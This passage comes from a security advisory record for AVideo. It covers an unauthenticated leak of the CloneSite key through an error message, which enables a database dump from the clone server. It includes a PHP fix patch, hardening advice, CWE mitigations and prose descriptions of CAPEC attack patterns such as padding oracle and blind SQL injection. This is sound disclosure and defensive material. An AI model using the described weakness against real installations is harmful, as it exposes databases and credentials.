`clones.json.php` hardening (the previously reported CWE-306 fix) does not cover this path; `cloneClient.json.php` is a distinct file that exposes a structurally different credential.\n\n## Recommended Fix\n\nDo not echo the expected key in the rejection message, and reject non-CLI / non-admin callers cleanly. Example patch for `plugin/CloneSite/cloneClient.json.php:51-60`:\n\n```php\n// Only accept the key argument from actual CLI invocations (intended usage:\n// cron \"php .../cloneClient.json.php \u003cmyKey\u003e\"). Over HTTP, require admin.\n$cliKey = (PHP_SAPI === \u0027cli\u0027 \u0026\u0026 !empty($argv[1]))\n    ? preg_replace(\"/[^A-Za-z0-9 ]/\", \u0027\u0027, $argv[1])\n    : \u0027\u0027;\n\nif (empty($objClone) || empty($cliKey) || $objClone-\u003emyKey !== $cliKey) {\n    if (!User::isAdmin()) {\n        $resp-\u003emsg = \"You can\u0027t do this\";\n        $log-\u003eadd(\"Clone: {$resp-\u003emsg}\");\n        // Do NOT echo $objClone-\u003emyKey \u2014 it is a shared secret used to\n        // authenticate to the configured remote clone server.\n        die(json_encode($resp));\n    }\n}\n```\n\nAdditional hardening recommended:\n\n- Replace the static `myKey = md5(systemRootPath . salt)` with a randomly generated, per-installation key stored in the plugin configuration that can be rotated (see similar advice from GHSA-wqcc-qf63-c2x4 / CWE-331 on AVideo secret generation).\n- On the remote side (`cloneServer.json.php`), consider requiring the `sqlFile` path to be unguessable (already is, via `uniqid()`) AND gating the dump behind an IP allowlist or an additional pre-shared rotating token, so that loss of a client\u0027s `myKey` does not immediately yield a full database dump.\n- Serve `videos/clones/` with an `.htaccess`/nginx rule that denies direct HTTP access, so that even if a rogue client is authenticated, the dump is not downloadable over the web.",
  "id": "GHSA-qm9p-p5pw-jrx2",
  "modified": "2026-05-13T14:19:24Z",
  "published": "2026-05-05T18:58:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-qm9p-p5pw-jrx2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43873"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/e6566f56a28f4556b2a0a09d03717a719dcb49da"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo: Unauthenticated Disclosure of CloneSite `myKey` via Error Echo in `cloneClient.json.php` Enables Cross-Site DB Dump of the Configured Clone Server"
}

Mitigation MIT-39
Implementation
  • Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.
  • If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.
  • Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not.
Mitigation
Implementation

Handle exceptions internally and do not display errors containing potentially sensitive information to a user.

Mitigation MIT-33
Implementation

Strategy: Attack Surface Reduction

Use naming conventions and strong types to make it easier to spot when sensitive data is being used. When creating structures, objects, or other complex entities, separate the sensitive and non-sensitive data as much as possible.

Mitigation MIT-40
Implementation Build and Compilation

Strategy: Compilation or Build Hardening

Debugging information should not make its way into a production release.

Mitigation MIT-40
Implementation Build and Compilation

Strategy: Environment Hardening

Debugging information should not make its way into a production release.

Mitigation
System Configuration

Where available, configure the environment to use less verbose error messages. For example, in PHP, disable the display_errors setting during configuration, or at runtime using the error_reporting() function.

Mitigation
System Configuration

Create default error pages or messages that do not leak any information.

CAPEC-215: Fuzzing for application mapping

An attacker sends random, malformed, or otherwise unexpected messages to a target application and observes the application's log or error messages returned. The attacker does not initially know how a target will respond to individual messages but by attempting a large number of message variants they may find a variant that trigger's desired behavior. In this attack, the purpose of the fuzzing is to observe the application's log and error messages, although fuzzing a target can also sometimes cause the target to enter an unstable state, causing a crash.

CAPEC-463: Padding Oracle Crypto Attack

An adversary is able to efficiently decrypt data without knowing the decryption key if a target system leaks data on whether or not a padding error happened while decrypting the ciphertext. A target system that leaks this type of information becomes the padding oracle and an adversary is able to make use of that oracle to efficiently decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). In addition to performing decryption, an adversary is also able to produce valid ciphertexts (i.e., perform encryption) by using the padding oracle, all without knowing the encryption key.

CAPEC-54: Query System for Information

An adversary, aware of an application's location (and possibly authorized to use the application), probes an application's structure and evaluates its robustness by submitting requests and examining responses. Often, this is accomplished by sending variants of expected queries in the hope that these modified queries might return information beyond what the expected set of queries would provide.

CAPEC-7: Blind SQL Injection

Blind SQL Injection results from an insufficient mitigation for SQL Injection. Although suppressing database error messages are considered best practice, the suppression alone is not sufficient to prevent SQL Injection. Blind SQL Injection is a form of SQL Injection that overcomes the lack of error messages. Without the error messages that facilitate SQL Injection, the adversary constructs input strings that probe the target through simple Boolean SQL expressions. The adversary can determine if the syntax and structure of the injection was successful based on whether the query was executed or not. Applied iteratively, the adversary determines how and where the target is vulnerable to SQL Injection.